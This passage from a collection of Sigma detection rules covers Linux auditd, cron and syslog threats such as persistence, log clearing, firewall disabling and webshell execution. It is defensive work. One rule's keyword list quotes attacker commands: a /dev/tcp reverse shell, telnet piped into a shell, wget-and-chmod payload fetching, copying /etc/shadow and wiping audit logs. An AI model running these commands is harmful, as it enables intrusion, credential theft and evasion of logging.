https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md author: Pawel Mazur date: 2021-09-03 modified: 2023-03-06 tags: - attack.discovery - attack.t1082 logsource: product: linux service: auditd detection: selection_1: type: PATH name: - /etc/lsb-release - /etc/redhat-release - /etc/issue selection_2: type: EXECVE a0: - uname - uptime - lsmod - hostname - env selection_3: type: EXECVE a0: grep a1|contains: - vbox - vm - xen - virtio - hv selection_4: type: EXECVE a0: kmod a1: list condition: 1 of selection_* falsepositives: - Likely level: low ================================================ FILE: rules/linux/auditd/path/lnx_auditd_auditing_config_change.yml ================================================ title: Auditing Configuration Changes on Linux Host id: 977ef627-4539-4875-adf4-ed8f780c4922 status: test description: Detect changes in auditd configuration files references: - https://github.com/Neo23x0/auditd/blob/master/audit.rules - Self Experience author: Mikhail Larin, oscd.community date: 2019-10-25 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1562.006 logsource: product: linux service: auditd detection: selection: type: PATH name: - /etc/audit/* - /etc/libaudit.conf - /etc/audisp/* condition: selection falsepositives: - Legitimate administrative activity level: high ================================================ FILE: rules/linux/auditd/path/lnx_auditd_bpfdoor_file_accessed.yml ================================================ title: BPFDoor Abnormal Process ID or Lock File Accessed id: 808146b2-9332-4d78-9416-d7e47012d83d status: test description: detects BPFDoor .lock and .pid files access in temporary file storage facility references: - https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor author: Rafal Piasecki date: 2022-08-10 tags: - attack.execution - attack.t1106 - 
attack.t1059 logsource: product: linux service: auditd detection: selection: type: 'PATH' name: - /var/run/haldrund.pid - /var/run/xinetd.lock - /var/run/kdevrund.pid condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/linux/auditd/path/lnx_auditd_hidden_binary_execution.yml ================================================ title: Use Of Hidden Paths Or Files id: 9e1bef8d-0fff-46f6-8465-9aa54e128c1e related: - id: d08722cd-3d09-449a-80b4-83ea2d9d4616 type: similar status: test description: Detects calls to hidden files or files located in hidden directories in NIX systems. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: David Burkett, @signalblur date: 2022-12-30 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.t1574.001 logsource: product: linux service: auditd detection: selection: type: 'PATH' name|contains: '/.' filter: name|contains: - '/.cache/' - '/.config/' - '/.pyenv/' - '/.rustup/toolchains' condition: selection and not filter falsepositives: - Unknown level: low ================================================ FILE: rules/linux/auditd/path/lnx_auditd_ld_so_preload_mod.yml ================================================ title: Modification of ld.so.preload id: 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 status: test description: Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md - https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html author: E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community date: 2019-10-24 modified: 2021-11-27 tags: - attack.privilege-escalation - attack.persistence - attack.defense-evasion - attack.t1574.006 logsource: product: linux service: auditd detection: selection: type: 'PATH' name: '/etc/ld.so.preload' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/auditd/path/lnx_auditd_logging_config_change.yml ================================================ title: Logging Configuration Changes on Linux Host id: c830f15d-6f6e-430f-8074-6f73d6807841 status: test description: Detect changes of syslog daemons configuration files references: - self experience author: Mikhail Larin, oscd.community date: 2019-10-25 modified: 2021-11-27 tags: - attack.defense-evasion - attack.t1562.006 logsource: product: linux service: auditd detection: selection: type: 'PATH' name: - /etc/syslog.conf - /etc/rsyslog.conf - /etc/syslog-ng/syslog-ng.conf condition: selection falsepositives: - Legitimate administrative activity level: high ================================================ FILE: rules/linux/auditd/path/lnx_auditd_magic_system_request_key.yml ================================================ title: Potential Abuse of Linux Magic System Request Key id: ea61bb82-a5e0-42e6-8537-91d29500f1b9 status: experimental description: | Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes, or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf. 
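references:
    - https://www.kernel.org/doc/html/v4.10/_sources/admin-guide/sysrq.txt
    - https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/4/html/reference_guide/s3-proc-sys-kernel
    - https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html
author: Milad Cheraghi
date: 2025-05-23
tags:
    - attack.execution
    - attack.t1059.004
    - attack.impact
    - attack.t1529
    - attack.t1489
    - attack.t1499
logsource:
    product: linux
    service: auditd
    definition: |
        Required auditd configuration:
        -w /proc/sysrq-trigger -p wa -k sysrq
        -w /proc/sys/kernel/sysrq -p wa -k sysrq
        -w /etc/sysctl.conf -p wa -k sysrq
        The /etc/sysctl.conf watch is needed for the '/sysctl.conf' selector below to produce any record; without it that selector is dead.
detection:
    selection:
        type: 'PATH'
        name|endswith:
            # Enable
            - '/sysrq'
            # Any change to sysctl.conf matches here, SysRq-related or not (the written key is not
            # visible in a PATH record); kernel.sysrq set via /etc/sysctl.d/*.conf is not covered.
            - '/sysctl.conf'
            # Execute
            - '/sysrq-trigger'
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: medium
================================================
FILE: rules/linux/auditd/path/lnx_auditd_system_info_discovery2.yml
================================================
title: System and Hardware Information Discovery
id: 1f358e2e-cb63-43c3-b575-dfb072a6814f
related:
    - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239
      type: derived
status: stable
description: Detects system information discovery commands
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware
author: Ömer Günal, oscd.community
date: 2020-10-08
modified: 2022-11-26
tags:
    - attack.discovery
    - attack.t1082
logsource:
    product: linux
    service: auditd
detection:
    # Hardware/OS identification files commonly read by VM-detection and fingerprinting code.
    # Requires read watches on these paths; the release files are also read by many
    # legitimate tools, hence the informational level.
    selection:
        type: 'PATH'
        name:
            - '/sys/class/dmi/id/bios_version'
            - '/sys/class/dmi/id/product_name'
            - '/sys/class/dmi/id/chassis_vendor'
            - '/proc/scsi/scsi'
            - '/proc/ide/hd0/model'
            - '/proc/version'
            - '/etc/*version'
            - '/etc/*release'
            - '/etc/issue'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: informational
================================================
FILE: rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml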
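================================================
title: Systemd Service Creation
id: 1bac86ba-41aa-4f62-9d6b-405eac99b485
status: test
description: Detects a creation of systemd services which could be used by adversaries to execute malicious code.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
author: 'Pawel Mazur'
date: 2022-02-03
modified: 2022-02-06
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1543.002
logsource:
    product: linux
    service: auditd
detection:
    # Only newly created names: covers new unit files and the *.wants/ symlinks made by
    # `systemctl enable`. In-place edits of an existing unit (nametype NORMAL) and
    # `systemctl edit` drop-ins on existing units are out of scope of this rule.
    path:
        type: 'PATH'
        nametype: 'CREATE'
    # System unit search path (systemd.unit(5)): /run is the runtime dir used by
    # `systemctl edit --runtime`; /lib exists on non-merged-usr Debian systems.
    name_1:
        name|startswith:
            - '/etc/systemd/system/'
            - '/run/systemd/system/'
            - '/usr/local/lib/systemd/system/'
            - '/usr/lib/systemd/system/'
            - '/lib/systemd/system/'
            - '/etc/systemd/user/'
    # Per-user units - no root required, common for user-level persistence.
    name_2:
        name|contains: '/.config/systemd/user/'
    condition: path and 1 of name_*
falsepositives:
    - Admin work like legit service installs.
level: medium
================================================
FILE: rules/linux/auditd/path/lnx_auditd_unix_shell_configuration_modification.yml
================================================
title: Unix Shell Configuration Modification
id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d
related:
    - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9
      type: obsolete
status: test
description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.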
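references:
    - https://objective-see.org/blog/blog_0x68.html
    - https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack
    - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
author: Peter Matkovski, IAI
date: 2023-03-06
modified: 2023-03-15
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.004
logsource:
    product: linux
    service: auditd
detection:
    # Shell startup/shutdown files. Every shell start reads these, so the watches must be
    # write-only (-p wa) or the rule fires on each login. zshenv is read by *every* zsh
    # invocation, interactive or not, which makes it the most attractive zsh hook for persistence.
    selection:
        type: 'PATH'
        name:
            - '/etc/shells'
            - '/etc/profile'
            - '/etc/profile.d/*'
            - '/etc/bash.bashrc'
            - '/etc/bashrc'
            - '/etc/zsh/zshenv'
            - '/etc/zsh/zprofile'
            - '/etc/zsh/zshrc'
            - '/etc/zsh/zlogin'
            - '/etc/zsh/zlogout'
            - '/etc/zshenv'
            - '/etc/csh.cshrc'
            - '/etc/csh.login'
            - '/root/.bashrc'
            - '/root/.bash_profile'
            - '/root/.bash_login'
            - '/root/.bash_logout'
            - '/root/.profile'
            - '/root/.zshenv'
            - '/root/.zshrc'
            - '/root/.zprofile'
            - '/root/.zlogin'
            - '/root/.zlogout'
            - '/home/*/.bashrc'
            - '/home/*/.zshrc'
            - '/home/*/.bash_profile'
            - '/home/*/.zprofile'
            - '/home/*/.profile'
            - '/home/*/.bash_login'
            - '/home/*/.bash_logout'
            - '/home/*/.zshenv'
            - '/home/*/.zlogin'
            - '/home/*/.zlogout'
    condition: selection
falsepositives:
    - Admin or User activity are expected to generate some false positives
level: medium
================================================
FILE: rules/linux/auditd/service_stop/lnx_auditd_disable_system_firewall.yml
================================================
title: Disable System Firewall
id: 53059bc0-1472-438b-956a-7508a94a91f0
status: test
description: Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.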
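references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
    - https://firewalld.org/documentation/man-pages/firewall-cmd.html
author: 'Pawel Mazur'
date: 2022-01-22
tags:
    - attack.t1562.004
    - attack.defense-evasion
logsource:
    product: linux
    service: auditd
detection:
    # SERVICE_STOP is emitted by systemd when a unit is stopped, so this covers
    # `systemctl stop <unit>` (and the stop at reboot/shutdown, which is a known source of noise).
    # Rule flushes that leave the unit running (`iptables -F`, `nft flush ruleset`,
    # `firewall-cmd --panic-off`) do not produce this record and need an EXECVE-based rule.
    selection:
        type: 'SERVICE_STOP'
        unit:
            - 'firewalld'
            - 'iptables'
            - 'ip6tables'
            - 'nftables'
            - 'ufw'
    condition: selection
falsepositives:
    - Admin activity
level: high
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_clean_disable_dmesg_logs_via_syslog.yml
================================================
title: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall
id: eca5e022-d368-4043-98e5-9736fb01f72f
status: experimental
description: |
    Detects the use of the `syslog` syscall with action code 5 (SYSLOG_ACTION_CLEAR), (4 is SYSLOG_ACTION_READ_CLEAR and 6 is SYSLOG_ACTION_CONSOLE_OFF) which clears the kernel ring buffer (dmesg logs).
    This can be used by attackers to hide traces after exploitation or privilege escalation.
    A common technique is running `dmesg -c`, which triggers this syscall internally.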
references:
    - https://man7.org/linux/man-pages/man2/syslog.2.html
    - https://man7.org/linux/man-pages/man1/dmesg.1.html
author: Milad Cheraghi
date: 2025-05-27
modified: 2025-12-05
tags:
    - attack.defense-evasion
    - attack.t1070.002
logsource:
    product: linux
    service: auditd
    definition: |
        Required auditd configuration:
        -a always,exit -F arch=b64 -S syslog -F a0=4 -k clear_dmesg_logs
        -a always,exit -F arch=b64 -S syslog -F a0=5 -k clear_dmesg_logs
        -a always,exit -F arch=b64 -S syslog -F a0=6 -k disable_dmesg_logs
        -a always,exit -F arch=b32 -S syslog -F a0=4 -k clear_dmesg_logs
        -a always,exit -F arch=b32 -S syslog -F a0=5 -k clear_dmesg_logs
        -a always,exit -F arch=b32 -S syslog -F a0=6 -k disable_dmesg_logs
detection:
    # The SYSCALL field is matched by name; raw audit.log carries the numeric syscall id, so this
    # requires resolved names (log_format=ENRICHED or ausearch -i) on the ingest path.
    # a0 is the syslog(2) "type" argument. auditd prints it in hex, which for 4-6 is identical.
    # Lowering the console level with `dmesg -n` (action 8, CONSOLE_LEVEL) is not covered.
    selection:
        type: 'SYSCALL'
        SYSCALL: 'syslog'
        a0:
            - 4 # SYSLOG_ACTION_READ_CLEAR : Read and clear log
            - 5 # SYSLOG_ACTION_CLEAR: Clear kernel ring buffer (without reading)
            - 6 # SYSLOG_ACTION_CONSOLE_OFF: Disable logging to console
    condition: selection
falsepositives:
    - System administrators or scripts that intentionally clear logs
    - Debugging scripts
level: medium
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_create_account.yml
================================================
title: Creation Of An User Account
id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512
status: test
description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
references:
    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files
    - https://access.redhat.com/articles/4409591#audit-record-types-2
    - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
author: Marie Euler, Pawel Mazur
date: 2020-05-18
modified: 2022-12-20
tags:
    - attack.t1136.001
    - attack.persistence
logsource:
    product: linux
    service: auditd
detection:
    # Any audited syscall made by the useradd binary; only produces records if a syscall rule
    # (e.g. on execve) covers it. Debian's adduser wrapper ends up calling useradd and is caught
    # here; busybox adduser and direct edits of /etc/passwd are not.
    selection_syscall_record_type:
        type: 'SYSCALL'
        exe|endswith: '/useradd'
    # Emitted by useradd itself through the audit user-message API, independent of audit rules.
    selection_add_user_record_type:
        type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos
    condition: 1 of selection_*
falsepositives:
    - Admin activity
level: medium
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml
================================================
title: Loading of Kernel Module via Insmod
id: 106d7cbd-80ff-4985-b682-a7043e5acb72
status: test
description: |
    Detects loading of kernel modules with insmod command.
    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
    Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
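references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md
    - https://linux.die.net/man/8/insmod
    - https://man7.org/linux/man-pages/man8/kmod.8.html
author: 'Pawel Mazur'
date: 2021-11-02
modified: 2022-12-25
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1547.006
logsource:
    product: linux
    service: auditd
detection:
    # insmod is a symlink to the multi-call kmod binary; comm keeps the invoked name while exe is
    # the resolved binary. exe is matched by suffix because kmod lives at /bin/kmod on
    # non-merged-usr systems and at /usr/bin/kmod elsewhere (the previous exact path missed the
    # former). comm is attacker-controlled (prctl/renamed binary); busybox insmod and direct
    # init_module/finit_module calls are not covered.
    selection:
        type: 'SYSCALL'
        comm: insmod
        exe|endswith: '/kmod'
    condition: selection
falsepositives:
    - Unknown
level: high
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml
================================================
title: Linux Network Service Scanning - Auditd
id: 3761e026-f259-44e6-8826-719ed8079408
related:
    - id: 3e102cd9-a70d-4a7a-9508-403963092f31
      type: derived
status: test
description: Detects enumeration of local or remote network services.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-21
modified: 2023-09-26
tags:
    - attack.discovery
    - attack.t1046
logsource:
    product: linux
    service: auditd
    definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183'
detection:
    # Outbound connect() syscalls (audit key from the referenced ruleset) made by the listed
    # scanner/client binaries. exe is the resolved path, so a renamed copy of nmap or a scanner
    # written in Python/Go does not match.
    selection:
        type: 'SYSCALL'
        exe|endswith:
            - '/telnet'
            - '/nmap'
            - '/netcat'
            - '/nc'
            - '/ncat'
            - '/nc.openbsd'
        key: 'network_connect_4'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml
================================================
title: Split A File Into Pieces - Linux
id: 2dad0cba-c62a-4a4f-949f-5f6ecd619769
status: test
description: 'Detection use of the command "split" to split files into parts and possible transfer.'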
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
author: 'Igor Fits, oscd.community'
date: 2020-10-15
modified: 2022-11-28
tags:
    - attack.exfiltration
    - attack.t1030
logsource:
    product: linux
    service: auditd
detection:
    # Any audited syscall whose comm (process name) is "split": fires once per audited syscall of
    # the process, so expect several hits per invocation. comm is attacker-controlled (a renamed
    # binary or prctl(PR_SET_NAME) changes it); there is no definition of which syscall rules are
    # required, so coverage depends on the local auditd ruleset.
    selection:
        type: 'SYSCALL'
        comm: 'split'
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml
================================================
title: System Info Discovery via Sysinfo Syscall
id: b207d563-a1d9-4275-b349-77d1eb55aa6d
status: experimental
description: |
    Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.
    Malware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.
references: - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md - https://man7.org/linux/man-pages/man2/sysinfo.2.html author: Milad Cheraghi date: 2025-05-30 modified: 2025-12-05 tags: - attack.discovery - attack.t1057 - attack.t1082 logsource: product: linux service: auditd definition: | Required auditd configuration: -a always,exit -F arch=b64 -S sysinfo -k discovery_sysinfo_syscall -a always,exit -F arch=b32 -S sysinfo -k discovery_sysinfo_syscall detection: selection: type: 'SYSCALL' SYSCALL: 'sysinfo' filter_optional_splunk: exe|endswith: '/bin/splunkd' condition: selection and not 1 of filter_optional_* falsepositives: - Legitimate administrative activity level: low ================================================ FILE: rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml ================================================ title: Program Executions in Suspicious Folders id: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc status: test description: Detects program executions in suspicious non-program folders related to malware or hacking activity references: - Internal Research author: Florian Roth (Nextron Systems) date: 2018-01-23 modified: 2021-11-27 tags: - attack.t1587 - attack.t1584 - attack.resource-development logsource: product: linux service: auditd detection: selection: type: 'SYSCALL' exe|startswith: # Temporary folder - '/tmp/' # Web server - '/var/www/' # Standard - '/home/*/public_html/' # Per-user - '/usr/local/apache2/' # Classical Apache - '/usr/local/httpd/' # Old SuSE Linux 6.* Apache - '/var/apache/' # Solaris Apache - '/srv/www/' # SuSE Linux 9.* - '/home/httpd/html/' # Redhat 6 or older Apache - '/srv/http/' # ArchLinux standard - '/usr/share/nginx/html/' # ArchLinux nginx # Data dirs of typically exploited services (incomplete list) - '/var/lib/pgsql/data/' - '/usr/local/mysql/data/' - '/var/lib/mysql/' - '/var/vsftpd/' - '/etc/bind/' - '/var/named/' condition: 
selection falsepositives: - Admin activity (especially in /tmp folders) - Crazy web applications level: medium ================================================ FILE: rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml ================================================ title: Special File Creation via Mknod Syscall id: 710bdbce-495d-491d-9a8f-7d0d88d2b41e status: experimental description: | Detects usage of the `mknod` syscall to create special files (e.g., character or block devices). Attackers or malware might use `mknod` to create fake devices, interact with kernel interfaces, or establish covert channels in Linux systems. Monitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications, and it can be abused to bypass file system restrictions or create backdoors. references: - https://man7.org/linux/man-pages/man2/mknod.2.html - https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8 author: Milad Cheraghi date: 2025-05-31 modified: 2025-12-05 tags: - attack.privilege-escalation - attack.persistence - attack.t1543.003 logsource: product: linux service: auditd detection: selection: type: 'SYSCALL' SYSCALL: 'mknod' condition: selection falsepositives: - Device creation by legitimate scripts or init systems (udevadm, MAKEDEV) - Container runtimes or security tools during initialization level: low ================================================ FILE: rules/linux/auditd/syscall/lnx_auditd_web_rce.yml ================================================ title: Webshell Remote Command Execution id: c0d3734d-330f-4a03-aae2-65dacc6a8222 status: test description: Detects possible command execution by web application/web shell references: - Personal Experience of the Author - https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/ author: Ilyas Ochkov, Beyu Denis, oscd.community date: 2019-10-12 modified: 2025-12-05 tags: - 
attack.persistence - attack.t1505.003 logsource: product: linux service: auditd definition: | Required auditd configuration: -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www -a always,exit -F arch=b32 -S execveat -F euid=33 -k detect_execve_www -a always,exit -F arch=b64 -S execveat -F euid=33 -k detect_execve_www Change the number "33" to the ID of your WebServer user. Default: www-data:x:33:33 detection: selection: type: 'SYSCALL' SYSCALL: - 'execve' - 'execveat' euid: 33 condition: selection falsepositives: - Admin activity - Crazy web applications level: critical ================================================ FILE: rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml ================================================ title: Relevant ClamAV Message id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb status: stable description: Detects relevant ClamAV messages references: - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml author: Florian Roth (Nextron Systems) date: 2017-03-01 tags: - attack.resource-development - attack.t1588.001 logsource: product: linux service: clamav detection: keywords: - 'Trojan*FOUND' - 'VirTool*FOUND' - 'Webshell*FOUND' - 'Rootkit*FOUND' - 'Htran*FOUND' condition: keywords falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml ================================================ title: Modifying Crontab id: af202fd3-7bff-4212-a25a-fb34606cfcbe status: test description: Detects suspicious modification of crontab file. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md author: Pawel Mazur date: 2022-04-16 tags: - attack.privilege-escalation - attack.execution - attack.persistence - attack.t1053.003 logsource: product: linux service: cron detection: keywords: - 'REPLACE' condition: keywords falsepositives: - Legitimate modification of crontab level: medium ================================================ FILE: rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml ================================================ title: Guacamole Two Users Sharing Session Anomaly id: 1edd77db-0669-4fef-9598-165bda82826d status: test description: Detects suspicious session with two users present references: - https://research.checkpoint.com/2020/apache-guacamole-rce/ author: Florian Roth (Nextron Systems) date: 2020-07-03 modified: 2021-11-27 tags: - attack.credential-access - attack.t1212 logsource: product: linux service: guacamole detection: selection: - '(2 users now present)' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/lnx_apt_equationgroup_lnx.yml ================================================ title: Equation Group Indicators id: 41e5c73d-9983-4b69-bd03-e13b67e9623c status: test description: Detects suspicious shell commands used in various Equation Group scripts and tools references: - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 author: Florian Roth (Nextron Systems) date: 2017-04-09 modified: 2021-11-27 tags: - attack.execution - attack.g0020 - attack.t1059.004 logsource: product: linux detection: keywords: # evolvingstrategy, elgingamble, estesfox - 'chown root*chmod 4777 ' - 'cp /bin/sh .;chown' # tmpwatch - 'chmod 4777 /tmp/.scsi/dev/bin/gsh' - 'chown root:root /tmp/.scsi/dev/bin/' # estesfox - 'chown root:root x;' # ratload - '/bin/telnet locip locport < /dev/console | /bin/sh' 
- '/tmp/ratload' # ewok - 'ewok -t ' # xspy - 'xspy -display ' # elatedmonkey - 'cat > /dev/tcp/127.0.0.1/80 < /dev/null' # noclient - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx' - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;' # auditcleaner - '> /var/log/audit/audit.log; rm -f .' - 'cp /var/log/audit/audit.log .tmp' # reverse shell - 'sh >/dev/tcp/* <&1 2>&1' # packrat - 'ncat -vv -l -p * <' - 'nc -vv -l -p * <' # empty bowl - '< /dev/console | uudecode && uncompress' - 'sendmail -osendmail;chmod +x sendmail' # echowrecker - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron' # dubmoat - 'chmod 666 /var/run/utmp~' # poptop - 'chmod 700 nscd crond' # abopscript - 'cp /etc/shadow /tmp/.' # ys - ' /dev/null 2>&1 && uncompress' # jacktelnet - 'chmod 700 jp&&netstat -an|grep' # others - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755' - 'chmod 700 crond' - 'wget http*; chmod +x /tmp/sendmail' - 'chmod 700 fp sendmail pt' - 'chmod 755 /usr/vmsys/bin/pipe' - 'chmod -R 755 /usr/vmsys' - 'chmod 755 $opbin/*tunnel' - 'chmod 700 sendmail' - 'chmod 0700 sendmail' - '/usr/bin/wget http*sendmail;chmod +x sendmail;' - '&& telnet * 2>&1 /var/log/syslog' - ' > /var/log/syslog' falsepositives: - '/syslog.' 
condition: keywords and not falsepositives
references: - https://redcanary.com/blog/ebpf-malware/ - https://man7.org/linux/man-pages/man7/bpf-helpers.7.html author: Red Canary (idea), Nasreddine Bencherchali date: 2023-01-25 tags: - attack.persistence - attack.defense-evasion logsource: product: linux detection: selection: - 'bpf_probe_write_user' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/builtin/lnx_privileged_user_creation.yml ================================================ title: Privileged User Has Been Created id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e status: test description: Detects the addition of a new user to a privileged group such as "root" or "sudo" references: - https://digital.nhs.uk/cyber-alerts/2018/cc-2825 - https://linux.die.net/man/8/useradd - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid author: Pawel Mazur date: 2022-12-21 modified: 2025-01-21 tags: - attack.privilege-escalation - attack.persistence - attack.t1136.001 - attack.t1098 logsource: product: linux definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work' detection: # Example of the events that could be observed when matching these would be as follow # Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash # Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash # Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash # Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash selection_new_user: - 'new user' selection_uids_gids: - 'GID=0,' # root group - 'UID=0,' # root UID - 
'GID=10,' # wheel group - 'GID=27,' # sudo group condition: all of selection_* falsepositives: - Administrative activity level: high ================================================ FILE: rules/linux/builtin/lnx_shell_clear_cmd_history.yml ================================================ title: Linux Command History Tampering id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e status: test description: | Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history". references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics - https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ author: Patrick Bareiss date: 2019-03-24 modified: 2024-04-17 tags: - attack.defense-evasion - attack.t1070.003 # Example config for this one (place it in .bash_profile): # (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & # It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history becomes empty # We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) # It has two advantages over the version suggested by Patrick Bareiss : # - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. 
We cannot be exhaustive for all the possibilities! # - the method suggested by Patrick Bareiss relies on logging the commands entered directly in a bash shell, so it may miss some events (for instance it does not log the commands launched from a Caldera agent). With the inotifywait approach, clearing .bash_history is detected regardless of which command emptied it
